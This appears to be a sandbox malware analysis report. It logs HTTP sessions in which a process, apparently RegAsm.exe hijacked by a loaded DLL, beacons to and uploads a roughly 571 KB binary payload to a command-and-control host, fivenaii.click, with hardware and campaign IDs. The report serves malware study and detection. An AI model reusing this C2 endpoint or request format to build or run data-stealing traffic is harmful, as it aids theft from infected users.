                                                                                              2024-12-27 21:33:39 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:39 UTC1123INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:39 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=sfeahf40fkmglrujcm4hjvvesl; expires=Tue, 22 Apr 2025 15:20:18 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BvZHaDepz08LhjcGaaG9eMsgOL644BEJf0f7Rgz7EwssjmtIPQJzYFH%2FKRT8JAxg7KslMSxxYYgH9JRDT6bmtkyB4WKzkNLbh7Ckxnk5jvfyqcCOXyI2TkYbzp6vwkrWsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e20a8317cb4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1962&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1416100&cwnd=230&unsent_bytes=0&cid=24fdd479dd7773d7&ts=809&x=0"
                                                                                              2024-12-27 21:33:39 UTC54INData Raw: 33 30 0d 0a 58 52 4a 51 49 38 2b 36 79 6e 67 54 44 54 2f 65 4b 79 4f 30 7a 61 78 48 47 79 50 59 32 76 78 6c 7a 4a 61 4d 4b 32 49 6c 45 33 30 47 54 77 3d 3d 0d 0a
                                                                                              Data Ascii: 30XRJQI8+6yngTDT/eKyO0zaxHGyPY2vxlzJaMK2IlE30GTw==
                                                                                              2024-12-27 21:33:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.449774104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:39 UTC269OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=LO675W50
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1189
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:39 UTC1189OUTData Raw: 2d 2d 4c 4f 36 37 35 57 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 4f 36 37 35 57 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4f 36 37 35 57 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 4c 4f 36 37 35 57 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                              Data Ascii: --LO675W50Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--LO675W50Content-Disposition: form-data; name="pid"1--LO675W50Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--LO675W50Content-Dis
                                                                                              2024-12-27 21:33:40 UTC1128INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=k8mojuhl4jkv6os13f735fs7o9; expires=Tue, 22 Apr 2025 15:20:19 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH5JTm9Vz878As0%2FR%2Bglb6ATx4NyCpw%2FQJiNSlz6AwERPcS99tpHmNYR3ic89keKDY91l05S%2B3VwM6jCmG803o4GZZdlMkRblllOEtWZlzPFtThqmXdXZn80Fp7L9Ec93Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e23386e4346-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1750&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2094&delivery_rate=1620421&cwnd=252&unsent_bytes=0&cid=89b63937d62c8260&ts=800&x=0"
                                                                                              2024-12-27 21:33:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.449775104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:41 UTC272OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=E8126BCFD
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571086
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 2d 2d 45 38 31 32 36 42 43 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 45 38 31 32 36 42 43 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 38 31 32 36 42 43 46 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 45 38 31 32 36 42 43 46 44 0d 0a 43 6f 6e 74 65 6e 74
                                                                                              Data Ascii: --E8126BCFDContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--E8126BCFDContent-Disposition: form-data; name="pid"1--E8126BCFDContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--E8126BCFDContent
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7 c2 12 cb 9a 33 ef 96 80 df 1e 9a 36 3a 50 10 fc e8 47 b3 37 8f 8c 04 aa c4 af dd 3c 9a 87 a2 d6 47 47 3c 57 7f be d5 10
                                                                                              Data Ascii: Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H36:PG7<GG<W
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee 60 ee 3e 58 bc 14 93 95 a7 76 27 9e 4d 6a 3d 48 be c0 68 58 38 c1 6e d4 cd 93 08 63 a6 d6 94 7d 28 0d c5 f8 68 f6 22 bc
                                                                                              Data Ascii: 9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c`>Xv'Mj=HhX8nc}(h"
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 97 d3 ef 2d 43 8a be fa ed 49 89 ed d2 57 7b ea c5 a5 67 57 c3 80 6d 0c 6a 8e 6d d6 9a 57 02 30 d4 df 77 3f 1e 79 c5 74 e9 0b ce 40 1d 68 99 6f de f7 68 9d 70 35 5c 29 35 c5 db 3a 18 e5 bf bb 36 f5 17 41 37 45 50 fc 45 ec 80 2f 38 63 f3 5f d1 e4 e8 f5 8e 3a a3 9c a5 89 66 ab ed a5 a2 8f 4e bc e4 68 f9 dd 25 35 9f b8 66 3b e7 c3 af 17 de fb ef 65 c8 0e 0b de a1 b8 7d 40 f7 22 3f 3f e4 48 3f 20 fc 57 4b 49 dd dc e4 5c a4 ba 86 2e d9 7d bc d1 1b b5 24 72 13 ed 71 cf 35 49 28 a9 41 4f d0 cc 05 8c b5 a9 31 95 ba bd 05 c1 b5 25 d8 79 94 ba 79 5c 86 4e 18 dc f2 bb 73 f2 73 37 8e d9 d3 7e b4 24 6d e1 11 65 6f 77 fb c7 b9 d4 ca 1f 1c 83 38 0b 8a ec d5 e6 bb 3c c5 8b e7 68 7e 65 ad fd e4 4f bb 67 78 fa 2d 7f aa 1e 74 7b f5 c1 56 8d 62 51 da 3c 56 ec a8 fd c9 7f 89
                                                                                              Data Ascii: -CIW{gWmjmW0w?yt@hohp5\)5:6A7EPE/8c_:fNh%5f;e}@"??H? WKI\.}$rq5I(AO1%yy\Nss7~$meow8<h~eOgx-t{VbQ<V
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: b8 cb 57 eb 34 c7 47 ca 68 bc cd c1 ab 9c 9c b3 e0 35 34 f2 42 75 a9 36 b9 aa 2c 09 1d 7b 40 75 c4 82 63 13 bc df d9 45 5e 6c f7 ce 9e 56 a6 db 43 6e b3 66 65 de 93 bf c7 4a 32 e0 55 81 9b d5 19 ae b9 10 6f 19 d1 8b 30 98 e3 82 3f cc 18 dc dc 8b 10 02 46 13 b9 50 1d 11 e8 bd 3e c3 47 1c 1c 57 b3 d9 81 3c 0f a5 37 44 fd af 4c da 22 83 02 6e 7b 4d 3a 15 dd 47 82 0f f7 32 9b 78 c0 10 c5 71 d4 5a d5 05 23 bc f3 ee fd a7 c3 ef b5 4d fd b5 24 1d ee 1f 91 b4 b9 a7 f2 5e d9 9c 94 ee 87 fe fb 80 d6 b4 70 32 61 05 62 f8 27 52 f9 fe ff af e4 86 24 28 1d e3 81 f3 c0 e2 9f 81 4b 32 8b 6f 84 18 55 e5 94 94 16 64 31 fc 79 b1 e4 51 11 0f 07 e1 3c d5 fe 89 b3 23 9c f0 5d a2 2c 2b 41 10 f1 67 7b 3a 50 d1 7e 86 24 d6 1a a4 06 6e 45 69 53 0f 7d dc f7 90 f5 e0 26 e7 bc 0e a1
                                                                                              Data Ascii: W4Gh54Bu6,{@ucE^lVCnfeJ2Uo0?FP>GW<7DL"n{M:G2xqZ#M$^p2ab'R$(K2oUd1yQ<#],+Ag{:P~$nEiS}&
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: e2 6c e7 e4 d2 da 90 8d 5b c5 fc 3a b3 08 39 a7 3a 09 e1 a6 72 64 85 45 e3 e7 e5 1a 6c b5 7c a1 8b 3d a1 40 ee 59 54 21 a9 d1 c0 c0 57 e0 c7 c1 96 40 aa ba 72 ab b7 76 6d 02 14 ef bd ed f3 2c 4d 0b 19 58 b0 fd 6a 47 ad 88 b5 0c 23 00 b1 ab d6 19 a5 1c ae cf b1 ed e2 98 d2 2f 84 01 41 37 c6 ee f1 f5 dc 3f 72 77 6b d2 a9 5e b1 bb c8 d9 a3 2d 59 a8 44 25 da 50 cc 7e bc ef f2 47 23 9b 6f fa 9e 05 82 86 1a 4d 61 5b 7c 61 a7 db f8 8a f3 0d 67 1d 63 7b 2b b6 1f fc 08 32 fc 21 74 ce 59 f6 57 5d e2 33 e8 77 09 36 b7 32 11 43 00 0f 86 0a e8 ad 6d 83 f2 b6 dc 1f ae 90 70 36 a2 77 10 b7 7e 8b 5e 70 54 e7 f0 96 3e ee 10 c7 1f 35 b1 75 94 5e 64 66 40 32 ac 92 64 44 ef 53 53 9f d5 93 c7 84 c0 3e 3f aa 43 fa a7 98 e7 41 fe 55 8c 1c 21 e6 f8 7d 1e b0 b0 d3 ce 6e 6b df 45
                                                                                              Data Ascii: l[:9:rdEl|=@YT!W@rvm,MXjG#/A7?rwk^-YD%P~G#oMa[|agc{+2!tYW]3w62Cmp6w~^pT>5u^df@2dDSS>?CAU!}nkE
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 99 5e ff 59 4e 91 13 25 ef ea 7a ce 2a f9 ff da 2a 7e e2 64 11 f0 f5 ce e1 bc b8 2a 8f 37 fb da 02 e3 74 fb be 21 f1 ee dc b7 aa ac 61 89 26 d8 85 53 25 c8 48 41 90 87 0e ac 2e cd 48 4a e3 04 21 37 50 e7 36 53 90 ba 9b 0d 9b 28 77 b8 55 f5 50 f4 c7 45 40 58 f5 0e 02 b7 70 32 b3 99 13 1c a8 92 ff 6d d9 2b 1b 1f bd 64 c0 b5 3b cb 43 b2 5e a6 fe f5 af 8f 1f 21 7f ec 8c cf 06 12 c4 7b 6f e0 16 71 c8 f2 5b 8e 69 ee 73 25 f1 d5 78 45 2b 5a 12 63 fd 67 26 3e f2 c9 66 68 0a 22 f9 36 0b b3 39 6e 4b 1a 4a 28 d0 46 c2 cd 07 ac 48 13 74 56 ee ac 96 7e 9b 8f 66 fd 8c 12 bd 89 06 b8 cd d5 9f 69 2c 9f 21 04 fd da e8 d2 e3 9c 7b 81 4c 76 80 73 f5 8f 6b 51 0e bd 60 b1 46 08 5c dd 18 2d f9 58 23 3d 5a a9 d4 b7 59 09 53 1f 03 10 5d 4a 7f c7 01 3c ca 3e 4a e7 3c 85 f2 ee 92
                                                                                              Data Ascii: ^YN%z**~d*7t!a&S%HA.HJ!7P6S(wUPE@Xp2m+d;C^!{oq[is%xE+Zcg&>fh"69nKJ(FHtV~fi,!{LvskQ`F\-X#=ZYS]J<>J<
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 87 98 77 a2 1e 08 98 83 d7 0d e7 af 85 c2 84 e7 21 fa fc 89 8b 43 15 0e a3 79 e9 04 11 4d 86 42 ba e2 6b 72 82 a7 29 6c 5a 0f 97 49 75 51 b9 ef a6 6d 2e 86 61 60 02 d9 99 ef 57 fb 7f db d3 5a f4 32 7f 24 6c 02 9e 03 73 cf 51 b0 ec fc 99 f1 17 58 98 0f c7 bb 28 8d ed 1c 9f 98 73 65 db 0f 44 1a 10 b5 51 66 62 7d 45 37 ec 6b 5d 94 d2 e7 c6 53 cc 2e 28 5e 52 ca 30 98 53 6f 73 8d b5 af 21 ca 87 ea 5d 12 8c 27 f3 03 5e 81 f5 d8 aa a3 ae f5 9d 66 4d e3 fb 43 1c a5 02 90 98 55 be a2 5e fa 03 4f 7f 12 f6 fa be 45 6f 28 19 d9 9d 1a d7 52 c3 7b 22 1a 68 36 9f 06 bf 95 af ea 97 78 72 5e 94 3d 38 3e 2c d1 ef b4 e9 fc 2f e2 09 a5 70 ff 54 fd 55 01 52 a0 47 0c 63 d8 28 bf a7 24 e0 9a d7 d2 e6 97 44 3c a9 d6 54 2e fd e7 75 da 59 bd a1 66 da 1c 62 a9 00 e6 75 53 75 c7 07
                                                                                              Data Ascii: w!CyMBkr)lZIuQm.a`WZ2$lsQX(seDQfb}E7k]S.(^R0Sos!]'^fMCU^OEo(R{"h6xr^=8>,/pTURGc($D<T.uYfbuSu
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: 82 98 f9 b2 a0 ea f2 7e 00 ff cb 0b a2 0d 26 dd 2b 73 d6 5e 26 b6 90 b5 b1 5c 07 d4 77 4d 1e 81 ed 66 0e 33 52 e0 ea 6e 53 79 88 14 0f 07 21 cb 84 33 2c dd 47 93 e1 d7 64 5e 8c 5d 90 c4 12 a7 f8 3a 7e 25 f8 2d 08 b7 12 10 91 6e 7e 1e f3 0f 54 b8 73 7b 2a d4 3b 1d 3a 96 20 cb 6c 5c a7 89 e0 77 c9 c2 ef 00 ca 6d 28 29 76 eb e0 f3 10 22 fe 06 e3 62 b2 ed 6c 77 d1 b0 1e 5b 46 58 c8 8d 7b f0 da 68 81 70 94 4a 27 e0 4e cc 85 1f 25 c0 5a 86 bf e6 98 9c 57 3a 6d 0d d1 12 a2 42 90 f2 46 a0 0e 55 98 20 42 27 ec bb 54 ff 00 e2 87 f8 f8 05 25 be d5 1c 78 14 2b ff f4 13 38 d0 fb b5 29 1f 65 d6 10 2c c1 79 03 d2 9f 04 ab 22 68 c1 ae 31 8d 2f 9e 0c aa 3b e4 b7 07 f0 cd 26 e5 91 f9 f9 66 b7 e8 51 61 82 c2 4c ed 65 61 be 6f d5 9f e5 19 da fc 74 2a db a5 8a c8 24 52 d2 9e
                                                                                              Data Ascii: ~&+s^&\wMf3RnSy!3,Gd^]:~%-n~Ts{*;: l\wm()v"blw[FX{hpJ'N%ZW:mBFU B'T%x+8)e,y"h1/;&fQaLeaot*$R
                                                                                              2024-12-27 21:33:41 UTC15331OUTData Raw: bc 10 1b 80 7d b4 45 ba ff 3f 40 99 7d ae f5 a8 d0 18 a4 9b 33 36 f4 f6 3f dd 3e 0e 1b df 05 75 0b b2 f9 e7 aa ef 1f be 25 41 d8 6e 14 c0 ed 85 c8 fc 50 c6 9e e8 a1 d8 7c 23 3b 14 0c 87 d9 ee de 66 e9 cf 59 b7 7e 06 d7 87 f0 72 a7 b0 ec 82 ec a3 fb a5 99 b7 1a d4 6c 4e 23 6b 1b e3 be bf f4 cd f1 52 00 7b f0 9c 80 c8 aa c5 18 a9 93 4e be dc 0f cd ae 0e b2 b4 a2 09 0b 7e b2 38 e7 f1 57 f3 db 00 3f 81 f8 6b 84 18 84 0b c6 6d fd 7a 76 69 34 49 84 e2 0b 99 3b e6 67 20 64 1e d6 8b ee 10 6c ca d2 3a 04 0e 5b a7 d7 d6 18 ad 06 a6 35 a1 4d 4b 31 fc f4 46 1e 8a b9 49 31 f7 3c cb 5a 4f fa 74 3d 8d 17 4c 6e a0 67 ec 40 d3 2f 61 8d 05 ca eb a4 5a d9 74 c5 fa 40 59 91 31 9d 37 ca 89 e1 de 52 cc 66 95 79 6f 57 c4 37 fd 56 a5 87 e2 39 0f ae f1 5b 00 76 2e 8a 10 bb a0 19
                                                                                              Data Ascii: }E?@}36?>u%AnP|#;fY~rlN#kR{N~8W?kmzvi4I;g dl:[5MK1FI1<ZOt=Lng@/aZt@Y17RfyoW7V9[v.
                                                                                              2024-12-27 21:33:44 UTC1135INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:43 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=shbudppio9k946k6f2nio64c5s; expires=Tue, 22 Apr 2025 15:20:22 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fFvfYeHuGCMzqFOg3%2FgQjZTYJ6Dfb7rE9oeCPbngl%2BjsBkjbSAH9VqFnpy2Jg%2FIKWifwXKEcFUKhd1lwYgxVjdy4zUeAJggSLEqUvR6Fxls5yfYygN%2FowmeXDVp96K4lkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e31cffe7d26-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2004&rtt_var=764&sent=297&recv=592&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573622&delivery_rate=1421616&cwnd=205&unsent_bytes=0&cid=698a9a854e16061f&ts=2274&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.449776104.21.60.244432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:45 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 87
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:45 UTC87OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 26 6a 3d 26 68 77 69 64 3d 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=VC6Dfm--TestOtctuk&j=&hwid=B9B295F31A84D198BEBA0C6A975F1733
                                                                                              2024-12-27 21:33:46 UTC1127INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=1d5cb7c180ul4u5ojogesr2ssv; expires=Tue, 22 Apr 2025 15:20:24 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RdS6kTUsh%2Bqp2o2GxCrl1rDo4WhiGqG6jURrzk6lhaihQSl%2FHz6ldLoka6jSkzOwqkcq4b8PVsyuLjkeHlpcnkK8EqBrWyeSEu5tWwfrVMDKpglXkDyNT7sT5%2By35B5L%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6e488e8c4399-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1884&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=985&delivery_rate=1541710&cwnd=222&unsent_bytes=0&cid=8424327633a3c83b&ts=790&x=0"
                                                                                              2024-12-27 21:33:46 UTC54INData Raw: 33 30 0d 0a 6f 2f 6a 30 78 31 73 37 5a 6f 38 37 61 65 6a 63 55 77 77 65 61 75 4c 37 31 32 32 33 4d 56 65 51 4f 71 76 43 78 59 6c 71 48 4e 6a 34 70 51 3d 3d 0d 0a
                                                                                              Data Ascii: 30o/j0x1s7Zo87aejcUwweauL71223MVeQOqvCxYlqHNj4pQ==
                                                                                              2024-12-27 21:33:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\loaddll32.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
                                                                                              Imagebase:0xab0000
                                                                                              File size:126'464 bytes
                                                                                              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:16:32:53
                                                                                              Start date:27/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
